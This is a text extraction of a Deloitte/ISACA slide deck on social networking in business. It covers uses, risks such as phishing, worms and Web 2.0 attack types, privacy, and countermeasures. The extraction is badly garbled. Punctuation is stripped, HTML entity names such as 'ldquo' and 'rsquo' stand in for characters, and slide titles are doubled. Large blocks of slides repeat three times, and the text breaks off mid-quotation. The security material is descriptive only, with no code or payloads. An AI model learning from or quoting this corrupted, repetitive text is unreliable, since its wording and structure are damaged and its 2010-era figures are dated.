Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
